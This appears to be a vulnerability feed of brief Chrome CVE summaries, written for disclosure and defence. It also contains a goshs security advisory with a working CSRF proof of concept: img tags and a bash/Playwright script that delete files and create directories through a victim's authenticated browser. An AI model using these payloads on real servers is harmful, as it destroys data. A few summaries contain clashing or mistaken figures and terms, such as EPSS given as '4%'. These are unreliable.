Remote code execution in Google Chrome versions prior to 147.0.7727.55 allows unauthenticated attackers to execute arbitrary code within the browser sandbox via a maliciously crafted HTML page exploiting a type confusion vulnerability in the V8 JavaScript engine. With CVSS 8.8 (High), network-based attack vector requiring only user interaction, and available vendor patch, this represents a significant but contained threat. EPSS score of 0.04% (11th percentile) indicates low observed exploitation probability, and no active exploitation or public POC is identified at time of analysis. The sandbox containment limits initial impact severity compared to full system compromise.
Remote code execution in Google Chrome's Skia graphics library (versions prior to 147.0.7727.55) allows remote attackers to execute arbitrary code within the browser's sandbox via specially crafted HTML pages exploiting an integer overflow vulnerability. Google patched this high-severity flaw in Chrome 147.0.7727.55 released April 2026. No active exploitation confirmed (not on CISA KEV), with low EPSS score (0.04%, 11th percentile) indicating minimal observed exploitation activity. Exploitation requires user interaction (visiting malicious webpage) but no authentication, making it viable for drive-by attacks against unpatched Chrome installations.
Heap buffer overflow in WebML (a web markup language component) in Google Chrome prior to version 147.0.7727.55 allows remote attackers to obtain potentially sensitive information from process memory by serving a crafted HTML page. The vulnerability requires no user authentication and can be triggered through normal web browsing, though exploitation has a low probability (EPSS 0.03%) and no public exploit code has been identified.
Arbitrary code execution in Google Chrome for macOS versions prior to 147.0.7727.55 occurs via heap buffer overflow in the ANGLE graphics layer when processing malicious HTML pages. Remote attackers can achieve full compromise of confidentiality, integrity, and availability within Chrome's sandbox by exploiting this CWE-122 heap overflow with low attack complexity and no authentication. EPSS probability is low (0.03%, 10th percentile) with no public exploit identified at time of analysis, indicating limited observed exploitation activity despite the high CVSS score of 8.8.
Heap buffer overflow in WebML component of Google Chrome prior to version 147.0.7727.55 allows unauthenticated remote attackers to read sensitive information from process memory via a specially crafted HTML page. The vulnerability requires no user authentication and only user interaction (page visit), with a CVSS score of 6.5 reflecting confidentiality impact and limited availability risk. No public exploit code or active exploitation has been confirmed at time of analysis, though a vendor patch is available.
Remote code execution in Google Chrome Media component (versions prior to 147.0.7727.55) enables unauthenticated attackers to execute arbitrary code within Chrome's sandbox via specially crafted HTML pages. Exploitation requires user interaction to visit a malicious site. The use-after-free memory corruption vulnerability achieves high confidentiality, integrity, and availability impact within the sandboxed environment. No public exploit identified at time of analysis.
Remote code execution within Chrome's V8 JavaScript sandbox affects Google Chrome versions prior to 147.0.7727.55 through a type confusion vulnerability. Attackers can execute arbitrary code by convincing users to visit a malicious webpage, requiring no authentication. Vendor-released patch available (Chrome 147.0.7727.55). No public exploit identified at time of analysis, with EPSS probability at 0.04% (11th percentile) indicating low observed exploitation likelihood despite high CVSS score of 8.8.
Heap buffer overflow in Google Chrome's WebAudio component prior to version 147.0.7727.55 allows unauthenticated remote attackers to read sensitive information from process memory by serving a crafted HTML page. The vulnerability has a CVSS score of 6.5 and EPSS probability of 0.03% (8th percentile), indicating low real-world exploitation likelihood despite the network attack vector and lack of user interaction requirements. Vendor-released patch is available.
Remote code execution in Google Chrome's V8 JavaScript engine (versions prior to 147.0.7727.55) allows attackers to execute arbitrary code within the browser sandbox via malicious HTML pages. Publicly available exploit code exists. While CVSS scored 8.8 (High), EPSS indicates low exploitation probability (0.04%, 11th percentile), suggesting limited real-world targeting despite proof-of-concept availability. No CISA KEV listing confirms active exploitation campaigns.
Remote code execution in Google Chrome versions prior to 147.0.7727.55 allows unauthenticated attackers to execute arbitrary code within the browser's sandbox through a crafted HTML page exploiting an inappropriate implementation in the V8 JavaScript engine. User interaction is required (visiting a malicious webpage). No public exploit identified at time of analysis, with EPSS exploitation probability at 0.04% (11th percentile), indicating low observed attacker interest despite high CVSS severity.
Remote code execution in Google Chrome's V8 JavaScript engine (versions prior to 147.0.7727.55) allows unauthenticated remote attackers to execute arbitrary code within the sandbox by exploiting a use-after-free memory corruption vulnerability through a malicious HTML page. User interaction (visiting a crafted website) is required. No public exploit identified at time of analysis, with EPSS probability at 4% (11th percentile), indicating relatively low immediate exploitation risk despite high CVSS severity.
Raindrop.io Bookmark Manager Web App version 5.6.76.0 allows remote unauthenticated attackers to obtain sensitive user data through insufficient validation of Chrome extension identifiers in crafted requests. The vulnerability exploits improper input validation (CWE-20) to bypass security controls, enabling information disclosure with low integrity impact. No active exploitation has been confirmed in CISA KEV, but publicly available vulnerability research exists on GitHub.
Out of bounds read in Skia in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted file. (Chromium security severity: Medium)
Remote code execution in Google Chrome on Android versions prior to 147.0.7727.101 is possible through a use-after-free vulnerability in the Payments feature. Attackers who successfully convince users to perform specific UI interactions on a malicious webpage can achieve arbitrary code execution with high impact to confidentiality, integrity, and availability. The vulnerability requires high attack complexity and user interaction (CVSS:3.1/AV:N/AC:H/PR:N/UI:R), indicating social engineering is necessary. Google has released Chrome 147.0.7727.101 to address this issue. No evidence of active exploitation (not in CISA KEV) or public proof-of-concept code has been identified at time of analysis.
Arbitrary code execution within Chrome's sandbox affects all versions prior to 147.0.7727.101 via crafted HTML pages exploiting a use-after-free in codec processing. Remote attackers require user interaction (visiting a malicious page) but need no authentication. CVSS 8.8 (High) with network attack vector, low complexity, and high impact across confidentiality, integrity, and availability. Google patched this in the stable channel update released April 15, 2026. No public exploit code or CISA KEV listing identified at time of analysis, though Chromium issue tracker #495996858 indicates vendor-confirmed vulnerability. The sandbox containment limits initial exploitation to Chrome's restricted environment, not direct system compromise.
Type Confusion in V8 in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to potentially perform out of bounds memory access via a crafted HTML page. (Chromium security severity: Medium)
Use after free in Cast in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)
Use after free in Codecs in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to potentially perform out of bounds memory access via a crafted video file. (Chromium security severity: High)
Heap buffer overflow in PDFium in Google Chrome on Windows prior to 147.0.7727.101 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: High)
Use after free in Forms in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Use after free in Permissions in Google Chrome on Android prior to 147.0.7727.101 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High)
Out of bounds write in GPU in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the GPU process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Insufficient policy enforcement in CORS in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High)
Insufficient policy enforcement in Passwords in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High)
Uninitialized Use in Accessibility in Google Chrome on Windows prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Use after free in Dawn in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Use after free in FileSystem in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to potentially exploit object corruption via a crafted HTML page. (Chromium security severity: High)
Use after free in Viz in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Out-of-bounds read in Google Chrome's media component (versions prior to 147.0.7727.101) enables remote code execution when attackers convince users to perform specific UI interactions on a malicious HTML page. Google rated this high severity and released Chrome 147.0.7727.101 as a fix. No active exploitation confirmed via CISA KEV at time of analysis, though CVSS 7.5 reflects significant impact if user interaction prerequisite is met. The UI gesture requirement and high attack complexity (AC:H) reduce automated exploitation risk compared to interaction-free vulnerabilities.
Type Confusion in Turbofan in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Heap buffer overflow in Google Chrome's PDFium library (versions prior to 147.0.7727.101) enables remote code execution within the Chrome sandbox when a victim opens a malicious PDF file. Despite CVSS 8.8 severity, exploitation requires user interaction (opening a crafted PDF) and is confined to the sandbox, limiting system-level impact. Vendor patch available in Chrome 147.0.7727.101. No active exploitation confirmed (not in CISA KEV), no public POC identified at time of analysis. EPSS data not provided.
Heap buffer overflow in PDFium in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted PDF file. (Chromium security severity: High)
Use after free in Graphite in Google Chrome prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High)
Arbitrary code execution within Google Chrome's sandbox affects all versions prior to 147.0.7727.101 through a use-after-free vulnerability in the codec processing components. Remote attackers can exploit this by tricking users into visiting a malicious webpage, achieving high-severity compromise of confidentiality, integrity, and availability within the sandboxed renderer process. Google has released version 147.0.7727.101 as a stable channel update to address this flaw. No evidence of active exploitation (not in CISA KEV) or public exploit code has been identified at time of analysis, though the simplicity of the attack vector (network-based, low complexity, requiring only user interaction) warrants prioritized patching.
Use after free in Video in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Type Confusion in Turbofan in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Use after free in CSS in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)
Use after free in Video in Google Chrome on Windows prior to 147.0.7727.101 allowed a remote attacker who had compromised the renderer process to perform out of bounds memory access via a crafted HTML page. (Chromium security severity: High)
Use after free in XR in Google Chrome on Android prior to 147.0.7727.101 allowed a remote attacker to perform an out of bounds memory read via a crafted HTML page. (Chromium security severity: Critical)
Use after free in Prerender in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical)
Heap buffer overflow in Skia in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Critical)
Use after free in Proxy in Google Chrome prior to 147.0.7727.101 allowed an attacker in a privileged network position to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)
Heap buffer overflow in ANGLE in Google Chrome prior to 147.0.7727.101 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical)
### Summary goshs contains a cross-site request forgery issue in its state-changing HTTP GET routes. An external attacker can cause an already authenticated browser to trigger destructive actions such as `?delete` and `?mkdir` because goshs relies on HTTP basic auth alone and performs no CSRF, `Origin`, or `Referer` validation for those routes. I reproduced this on `v2.0.0-beta.5`. ### Details The vulnerable request handling is reachable through normal GET requests: - `httpserver/handler.go:118-123` dispatches `?mkdir` directly to `handleMkdir()` - `httpserver/handler.go:180-186` dispatches `?delete` directly to `deleteFile()` Authentication is enforced only by HTTP basic auth: - `httpserver/middleware.go:20-87` accepts any request that presents valid cached or replayed basic-auth credentials The resulting state changes hit filesystem mutation sinks: - `httpserver/handler.go:683-718` calls `os.RemoveAll()` in `deleteFile()` - `httpserver/handler.go:961-1000` calls `os.MkdirAll()` in `handleMkdir()` Because browsers can replay HTTP basic-auth credentials on subresource requests, an attacker-controlled page can embed: - `<img src="http://127.0.0.1:18095/victim.txt?delete">` - `<img src="http://127.0.0.1:18095/csrfmade?mkdir">` If the victim has already authenticated to goshs, those requests are treated as legitimate authenticated actions and the server mutates the filesystem. ### PoC Manual verification commands used: `Terminal 1` ```bash cd '/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' go build -o /tmp/goshs_beta5 ./ rm -rf /tmp/goshs_csrf_root /tmp/goshs_csrf_site mkdir -p /tmp/goshs_csrf_root /tmp/goshs_csrf_site printf 'delete me\n' > /tmp/goshs_csrf_root/victim.txt cat > /tmp/goshs_csrf_site/delete.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/victim.txt?delete"> </body> </html> HTML cat > /tmp/goshs_csrf_site/mkdir.html <<'HTML' <!doctype html> <html> <body> <img src="http://127.0.0.1:18095/csrfmade?mkdir"> </body> </html> HTML /tmp/goshs_beta5 -d /tmp/goshs_csrf_root -p 18095 -b 'u:p' ``` `Terminal 2` ```bash python3 -m http.server 18889 --directory /tmp/goshs_csrf_site ``` Victim actions: 1. Open `http://127.0.0.1:18095/` in a browser and authenticate with `u:p`. 2. Visit `http://127.0.0.1:18889/delete.html`. 3. Visit `http://127.0.0.1:18889/mkdir.html`. Two terminal commands I ran during local validation: ```bash test -e /tmp/goshs_csrf_root/victim.txt && echo EXISTS || echo DELETED test -d /tmp/goshs_csrf_root/csrfmade && echo CREATED || echo MISSING ``` Expected result: - the first check prints `DELETED` - the second check prints `CREATED` PoC Video 1: https://github.com/user-attachments/assets/94b78934-0a70-479f-9b89-43a859939473 Single-script verification: ```bash '/Users/r1zzg0d/Documents/CVE hunting/output/poc/gosh_poc3' ``` Observed script result: - `Delete status: DELETED` - `mkdir status: CREATED` - `[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET` PoC Video 2: https://github.com/user-attachments/assets/1143e039-81e4-4476-a1c3-f81ae46c9ede `gosh_poc3` script content: ```bash #!/usr/bin/env bash set -euo pipefail REPO='/Users/r1zzg0d/Documents/CVE hunting/targets/goshs_beta5' PLAY_DIR='/tmp/codex-playwright' BIN='/tmp/goshs_beta5_csrf' PORT='18095' ATTACKER_PORT='18889' CHROME='/Applications/Google Chrome.app/Contents/MacOS/Google Chrome' WORKDIR="$(mktemp -d /tmp/goshs-csrf-beta5-XXXXXX)" ROOT="$WORKDIR/root" SITE="$WORKDIR/site" GOSHS_PID="" ATTACKER_PID="" cleanup() { if [[ -n "${ATTACKER_PID:-}" ]]; then kill "${ATTACKER_PID}" >/dev/null 2>&1 || true fi if [[ -n "${GOSHS_PID:-}" ]]; then kill "${GOSHS_PID}" >/dev/null 2>&1 || true fi } trap cleanup EXIT mkdir -p "$ROOT" "$SITE" printf 'delete me\n' > "$ROOT/victim.txt" cat > "$SITE/delete.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/victim.txt?delete"> </body> </html> HTML cat > "$SITE/mkdir.html" <<HTML <!doctype html> <html> <body> <img src="http://127.0.0.1:${PORT}/csrfmade?mkdir"> </body> </html> HTML echo "[1/6] Building goshs beta.5" (cd "$REPO" && go build -o "$BIN" ./) echo "[2/6] Starting goshs with HTTP basic auth" "$BIN" -d "$ROOT" -p "$PORT" -b 'u:p' >"$WORKDIR/goshs.log" 2>&1 & GOSHS_PID=$! for _ in $(seq 1 40); do if curl -s -u u:p "http://127.0.0.1:${PORT}/" >/dev/null 2>&1; then break fi sleep 0.25 done echo "[3/6] Serving attacker pages" python3 -m http.server "$ATTACKER_PORT" --directory "$SITE" >"$WORKDIR/attacker.log" 2>&1 & ATTACKER_PID=$! if [[ ! -d "$PLAY_DIR/node_modules/playwright-core" ]]; then mkdir -p "$PLAY_DIR" (cd "$PLAY_DIR" && npm install --no-save playwright-core >/dev/null) fi if [[ ! -x "$CHROME" ]]; then echo "[ERROR] Chrome not found at $CHROME" >&2 exit 1 fi echo "[4/6] Visiting attacker pages from an authenticated browser" node - <<'NODE' const { chromium } = require('/tmp/codex-playwright/node_modules/playwright-core'); (async () => { const browser = await chromium.launch({ headless: true, executablePath: '/Applications/Google Chrome.app/Contents/MacOS/Google Chrome', }); const context = await browser.newContext({ httpCredentials: { username: 'u', password: 'p' }, }); const page = await context.newPage(); await page.goto('http://127.0.0.1:18095/', { waitUntil: 'domcontentloaded' }); await page.goto('http://127.0.0.1:18889/delete.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await page.goto('http://127.0.0.1:18889/mkdir.html', { waitUntil: 'domcontentloaded' }); await page.waitForTimeout(1200); await browser.close(); })(); NODE echo "[5/6] Verifying impact" DELETE_STATUS="MISSING" MKDIR_STATUS="MISSING" if [[ ! -e "$ROOT/victim.txt" ]]; then DELETE_STATUS="DELETED" fi if [[ -d "$ROOT/csrfmade" ]]; then MKDIR_STATUS="CREATED" fi echo "[6/6] Results" echo "Delete status: $DELETE_STATUS" echo "mkdir status: $MKDIR_STATUS" if [[ "$DELETE_STATUS" == "DELETED" && "$MKDIR_STATUS" == "CREATED" ]]; then echo '[RESULT] VULNERABLE: attacker-controlled pages triggered authenticated state changes via GET' else echo '[RESULT] NOT REPRODUCED' exit 1 fi ``` ### Impact This issue lets an external attacker abuse an authenticated victim's browser to perform filesystem mutations on the goshs server. In the demonstrated case, the attacker deletes an existing file and creates a new directory without the victim intentionally performing either action. Any deployment that relies on HTTP basic auth for web access is exposed to cross-site state changes when a user visits attacker-controlled content while authenticated. ### Remediation Suggested fixes: 1. Move all state-changing functionality such as `delete` and `mkdir` off GET routes and require non-idempotent methods such as `POST` or `DELETE`. 2. Add CSRF protections for authenticated browser actions, including per-request CSRF tokens plus strict `Origin` and `Referer` validation. 3. Treat any rendered HTML content as untrusted and isolate it from issuing authenticated same-origin requests.
Google Chrome prior to 147.0.7727.55 contains insufficient validation of untrusted input in WebSockets that allows a remote attacker with a compromised renderer process to bypass same-origin policy via a crafted HTML page. This vulnerability requires prior renderer compromise and user interaction, limiting real-world exploitability despite the high CVSS score. EPSS scoring (0.02%, 6th percentile) and Chromium's own Low severity classification indicate minimal practical risk despite the integrity impact rating.
Google Chrome prior to version 147.0.7727.55 contains an information disclosure vulnerability in the Navigation component that allows a remote attacker with a compromised renderer process to leak cross-origin data via a crafted HTML page. The vulnerability requires user interaction and only affects confidentiality (CVSS 4.3), with an extremely low EPSS score of 0.03% indicating minimal real-world exploitation probability despite the unauthenticated attack vector.
Out-of-bounds memory write in Google Chrome's WebML component (versions prior to 147.0.7727.55) allows remote attackers to corrupt memory via malicious HTML pages, enabling potential code execution or denial of service. Exploitation requires user interaction to visit a crafted webpage. CVSS 8.1 severity reflects unauthenticated network-based attack with high integrity and availability impact. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS 0.04%).
Type confusion vulnerability in Google Chrome CSS engine (versions prior to 147.0.7727.55) enables heap corruption through malicious extensions. Attacker must convince user to install crafted Chrome extension, then exploit triggers memory corruption allowing high-severity impacts: arbitrary code execution, information disclosure, and denial of service. CVSS 8.8 rating reflects unauthenticated network vector requiring only user interaction. No public exploit identified at time of analysis. Chromium project classifies severity as Low despite critical CVSS score, indicating successful exploitation barriers beyond user interaction.
Out-of-bounds read in Google Chrome's Blink rendering engine (versions prior to 147.0.7727.55) allows remote attackers to disclose sensitive memory contents and trigger denial-of-service via malicious HTML pages. Despite an 8.1 CVSS score, this is rated Chromium security severity 'Low', requires user interaction (visiting a crafted page), has minimal real-world exploitation probability (EPSS 0.03%, 10th percentile), and is not actively exploited (no KEV listing). Vendor-released patch available in Chrome 147.0.7727.55.
Integer overflow in Google Chrome's WebRTC component (versions prior to 147.0.7727.55) enables remote attackers to trigger out-of-bounds memory writes through specially crafted HTML pages. Exploitation requires user interaction (visiting malicious page) but no authentication, potentially allowing arbitrary code execution, data corruption, or information disclosure. Vendor-assigned security severity: Low; CVSS 8.8 reflects high impact across confidentiality, integrity, and availability. No public exploit identified at time of analysis.
Content security policy bypass in Google Chrome prior to version 147.0.7727.55 allows remote attackers to bypass CSP protections via ServiceWorker policy manipulation when users interact with crafted HTML pages. The vulnerability requires user interaction (UI:R in CVSS) and results in integrity impact only; EPSS exploitation probability is minimal at 0.02%, and Chromium rates the security severity as low despite the policy bypass nature.
Integer overflow in Google Chrome's media handling (versions prior to 147.0.7727.55) enables remote attackers to trigger heap corruption through specially crafted video files, achieving potential arbitrary code execution with high confidentiality, integrity, and availability impact. Attack requires user interaction to open malicious media content. Exploitation is unauthenticated (network-accessible). No public exploit identified at time of analysis. Classified as low severity by Chromium project despite CVSS 8.8 rating.
Integer overflow in Google Chrome's Media component enables remote heap corruption through malicious video files. Affects Chrome versions prior to 147.0.7727.55 on all desktop platforms. Unauthenticated attackers can achieve arbitrary code execution, data theft, or denial of service by convincing users to open specially crafted video content. CVSS 8.8 severity reflects network-based attack requiring user interaction. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS <1%).
Integer overflow in Google Chrome's Media component allows remote attackers to trigger heap corruption via specially crafted video files. Affects Chrome versions prior to 147.0.7727.55. Attack requires user interaction (opening malicious video file) but no authentication. Successful exploitation enables arbitrary code execution with high impact to confidentiality, integrity, and availability. No public exploit identified at time of analysis. Chromium project rates severity as Low despite CVSS 8.8 score.
Out-of-bounds memory read in Google Chrome's media subsystem (versions prior to 147.0.7727.55) enables remote attackers to disclose sensitive information and trigger denial-of-service conditions via malicious video files. Exploitation requires user interaction (opening/playing crafted video content). Attack vector is network-based with low complexity and no authentication required. No public exploit identified at time of analysis. Low observed exploitation activity (EPSS 0.03%, 10th percentile).
Omnibox spoofing in Google Chrome on Android prior to version 147.0.7727.55 allows remote attackers to deceive users by displaying falsified URL bar contents through a crafted HTML page, enabling phishing and social engineering attacks without requiring user interaction beyond visiting a malicious site. Despite a low CVSS score of 4.3 and minimal EPSS exploitation probability (0.03%), the vulnerability has real-world impact because attackers can trick users into believing they are on legitimate domains while actually on attacker-controlled pages.
Domain spoofing via incorrect security UI in Google Chrome on Windows prior to version 147.0.7727.55 allows unauthenticated remote attackers to deceive users through crafted HTML pages that exploit flawed permission display mechanisms. The attack requires user interaction (clicking or viewing a malicious page) but carries moderate real-world risk due to low EPSS exploitation probability (0.03%, 7th percentile) despite the high CVSS impact score, suggesting the vulnerability requires specific user actions or conditions to successfully exploit.
Heap corruption via malicious Chrome extension exploits use-after-free flaw in V8 JavaScript engine, affecting Chrome versions prior to 147.0.7727.55. Attacker must convince user to install a crafted extension to achieve potential remote code execution with high confidentiality, integrity, and availability impact. EPSS score of 0.01% (1st percentile) indicates minimal observed exploitation activity; no CISA KEV listing or public exploit code identified at time of analysis. Despite high CVSS 8.8
Bypass of iframe sandbox navigation restrictions in Google Chrome prior to version 147.0.7727.55 allows remote attackers to circumvent security boundaries via a crafted HTML page combined with specific user UI gestures. The vulnerability affects the IFrameSandbox security mechanism, which is designed to prevent iframes from navigating the top-level window; successful exploitation requires user interaction but results in direct integrity impact through unauthorized navigation. This is a low-severity issue with minimal exploitation probability (EPSS 0.02%, percentile 3%) and no confirmed active exploitation.
Media stream metadata corruption in Google Chrome for Android prior to 147.0.7727.55 enables remote attackers who have already compromised the renderer process to corrupt media stream metadata via a race condition (CWE-362) in the Media component. Despite a critical CVSS 9.8 score with network-accessible attack vector, real-world exploitation requires pre-compromise of the renderer, and EPSS probability is very low (0.03%, 9th percentile). Vendor patch released in Chrome 147.0.7727.55. No public exploit or active exploitation (KEV) identified at time of analysis. Chromium rates this Low severity, contrasting sharply with the theoretical CVSS rating.
Insufficient policy enforcement in Google Chrome's DevTools allows unauthenticated attackers who convince users to install a malicious extension to bypass enterprise host restrictions and modify cookies, affecting Chrome versions prior to 147.0.7727.55. The vulnerability requires user interaction to install the malicious extension but grants attackers the ability to circumvent security policies protecting sensitive cookie data. With an EPSS score of 0.01% and Chromium severity rated as Low, real-world exploitation is unlikely despite the moderate CVSS score of 6.5.
Google Chrome versions prior to 147.0.7727.55 contain a policy bypass vulnerability in the Downloads feature that allows remote attackers to circumvent multi-download protections through a crafted HTML page. The vulnerability requires user interaction (clicking or accepting a download), affects integrity only (no code execution or availability impact), and carries a low Chromium severity rating. EPSS exploitation probability is minimal at 0.02% (3rd percentile), indicating this is primarily a user-experience or policy-enforcement issue rather than a critical security risk.
Insufficient policy enforcement in History Navigation in Google Chrome prior to version 147.0.7727.55 enables cross-site scripting (UXSS) attacks when users perform specific UI gestures on attacker-controlled pages, allowing injection of arbitrary scripts or HTML with potential impact on user data confidentiality and integrity. The vulnerability affects all Chrome versions before 147.0.7727.55 across all platforms, requires user interaction with specific UI gestures but no authentication, and carries a low Chromium severity rating despite a moderate CVSS score. No public exploit code has been identified at the time of analysis, though the vulnerability was tracked via Chromium issue tracking.
UI spoofing in Google Chrome on iOS prior to version 147.0.7727.55 allows remote attackers to deceive users through malicious HTML pages that manipulate the Omnibox security indicator, enabling phishing or credential theft without code execution. The vulnerability requires user interaction and has low confidentiality impact, reflected in both the CVSS score of 4.3 and minimal EPSS score of 0.03%, indicating limited real-world exploitation likelihood despite public discoverability.
UI spoofing in Google Chrome's Downloads interface prior to version 147.0.7727.55 allows remote attackers to deceive users into performing unintended actions via crafted HTML pages exploiting incorrect security UI rendering. The vulnerability requires user interaction with specific UI gestures on a malicious webpage, resulting in limited integrity impact through visual deception rather than code execution or data exfiltration. Although marked as low severity by Chromium and carrying minimal exploitation probability (EPSS 0.03%), the attack surface is broad given Chrome's prevalence as a target for social engineering.
Google Chrome prior to version 147.0.7727.55 contains a sandbox bypass vulnerability in the Audio subsystem that allows remote attackers to circumvent download policy restrictions by convincing users to perform specific UI gestures on a crafted HTML page. The vulnerability has low practical exploitability (EPSS 0.02%) and requires active user interaction, limiting real-world risk despite cross-origin scope impact.
Google Chrome on iOS prior to version 147.0.7727.55 contains an Omnibox (URL bar) spoofing vulnerability that allows remote attackers to display misleading domain names to users through crafted domains, potentially enabling phishing attacks. The vulnerability requires user interaction (clicking a link) and affects iOS-specific browser UI rendering. While assigned a low Chromium security severity and rated 5.4 CVSS, the practical exploitation probability remains minimal (0.03% EPSS) due to the high user-interaction requirement and limited information-disclosure impact.
Google Chrome prior to version 147.0.7727.55 contains an inappropriate PDF implementation that allows remote attackers to bypass navigation restrictions via a crafted HTML page. The vulnerability requires user interaction to trigger and offers low real-world risk, with an EPSS score of 0.02% (3rd percentile) indicating minimal exploitation probability despite its network-accessible attack vector. A vendor-released patch is available.
Remote code execution in Google Chrome prior to 147.0.7727.55 exploits a race condition in the V8 JavaScript engine to corrupt heap memory via crafted HTML, requiring user interaction. The vulnerability affects all Chrome versions below 147.0.7727.55 across all platforms via the CPE cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*. No public exploit code or active exploitation has been confirmed at time of analysis, though the Chromium security team rated it medium severity; EPSS scoring at 0.03% (9th percentile) indicates low real-world exploitation probability despite the high CVSS score of 6.8.
Insufficient policy enforcement in PWA installation within Google Chrome prior to version 147.0.7727.55 allows a local attacker with renderer process compromise to install a Progressive Web App without user consent via a crafted HTML page. This vulnerability requires prior compromise of the renderer process and user interaction, resulting in high integrity and availability impact. The issue carries a low real-world exploitation probability (EPSS 0.03%), reflecting the significant prerequisites needed to trigger the vulnerability.
UI spoofing in Google Chrome prior to version 147.0.7727.55 allows remote attackers with a compromised renderer process to deceive users through crafted HTML pages. The vulnerability requires prior renderer compromise, limiting real-world exploitation to scenarios where an attacker has already achieved code execution within the browser's sandboxed rendering context. No active exploitation confirmed; EPSS score of 0.03% indicates minimal exploitation probability.
Race in WebCodecs in Google Chrome prior to 147.0.7727.55 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium)
Cryptographic weakness in PDFium allows unauthenticated remote attackers to decrypt and read sensitive information from password-protected PDFs through brute-force attacks when users view malicious or compromised PDF files in Google Chrome versions prior to 147.0.7727.55. The vulnerability requires user interaction (opening a PDF) but combines weak cryptographic design (CWE-326) with low attack complexity, making it feasible for attackers to extract confidential content from encrypted documents. EPSS score of 0.01% indicates minimal real-world exploitation likelihood despite Chromium's medium severity classification.
Information disclosure in Google Chrome prior to 147.0.7727.55 allows remote attackers to read sensitive process memory through the WebCodecs API via a crafted HTML page. Exploitation requires user interaction (UI:R) to visit a malicious webpage but grants high-confidence memory access. The vulnerability has low real-world exploitation probability (EPSS 0.03%) despite satisfying network-accessible conditions, likely due to unreliable memory content extraction and WebCodecs' limited practical attack surface in typical user workflows.
Google Chrome on Windows prior to version 147.0.7727.55 fails to properly validate user input in the Downloads functionality, allowing remote attackers to bypass download restrictions through a crafted HTML page. The vulnerability requires user interaction (clicking a link or visiting a malicious page) but has low real-world impact-it enables integrity bypass only, not code execution or confidentiality breaches. No public exploit code or active exploitation has been identified; the low EPSS score (0.02%) reflects minimal practical risk despite the network attack vector.
Out-of-bounds read in Google Chrome WebAudio (Mac) prior to version 147.0.7727.55 enables remote information disclosure via crafted HTML. Unauthenticated network-based attacker can extract sensitive process memory without user interaction. CVSS 7.5 (High confidentiality impact). No public exploit identified at time of analysis. Low observed exploitation activity (EPSS <1%). Patch available from vendor.
Memory disclosure in Google Chrome on Windows prior to version 147.0.7727.55 allows remote attackers to extract sensitive information from process memory by delivering a crafted HTML page through WebML parsing. The vulnerability stems from insufficient input validation in the WebML component and requires user interaction (visiting a malicious page), making it a moderate-risk information disclosure affecting a ubiquitous browser platform.
Remote code execution in Google Chrome prior to 147.0.7727.55 allows attackers to escape renderer sandbox via malicious HTML page. A remote attacker who has already compromised the renderer process can achieve arbitrary code execution within the sandbox through insufficient input validation in Chrome's Media component. Requires user interaction (visiting crafted page). EPSS score of 0.05% (16th percentile) indicates low observed exploitation probability; no confirmed active exploitation (not in CISA KEV). Vendor patch released in Chrome 147.0.7727.55.
Use after free in Media in Google Chrome prior to 147.0.7727.55 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Medium)
UI spoofing in Google Chrome fullscreen mode prior to version 147.0.7727.55 allows remote attackers to deceive users with crafted HTML pages displaying fake security UI elements, potentially leading to credential theft or malware distribution through trusted-looking interface impersonation. The vulnerability requires user interaction (clicking/navigating to the malicious page) but poses moderate integrity risk due to the deceptive nature of fullscreen UI manipulation. No active exploitation has been confirmed, though the attack vector is straightforward for mass phishing campaigns.
